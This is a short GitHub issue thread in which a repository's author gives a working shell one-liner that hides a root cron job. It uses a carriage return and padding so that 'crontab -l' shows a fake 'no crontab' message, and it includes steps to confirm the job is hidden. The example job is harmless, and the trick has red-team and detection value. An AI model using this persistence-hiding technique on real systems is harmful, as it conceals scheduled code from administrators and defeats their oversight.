### ISSUE TITLE
need guidance related to task

### ISSUE THREAD

**Issue by maazullah96** [0xceba/hide_crontab_carriage_return#1]
I am currently trying to do the same task of hiding a cronjob if you can guide me I have tried running your code  but it always shows me the result for the crontab -l
![Screenshot from 2021-07-08 10-24-46](https://user-images.githubusercontent.com/30190807/124867070-dc7b5e00-dfd6-11eb-95a7-d3100b93c019.png)
it does not work for root

**Comment by 0xceba** [comment]
Hello @maazullah96,

I recommend the following steps to execute this tactic as the root user:
1. Switch to root user: `sudo su root`
1. Reset crontab: `crontab -r`
1. Execute one-liner: `cc="* * * * * touch /tmp/1" ; ct=$(printf "$cc;\rno crontab for $USER%*s" $(expr length "$cc" - 14 - $(expr length $USER))) ; echo "$ct" | crontab -`
1. Confirm deployment:
    - Should display fake message: `crontab -l`
    - Should display the hidden cronjob: `cat -e /var/spool/cron/crontabs/root`

Does this work for you?

**Comment by maazullah96** [comment]
Thanks, @0xceba  for your help. It worked for me.
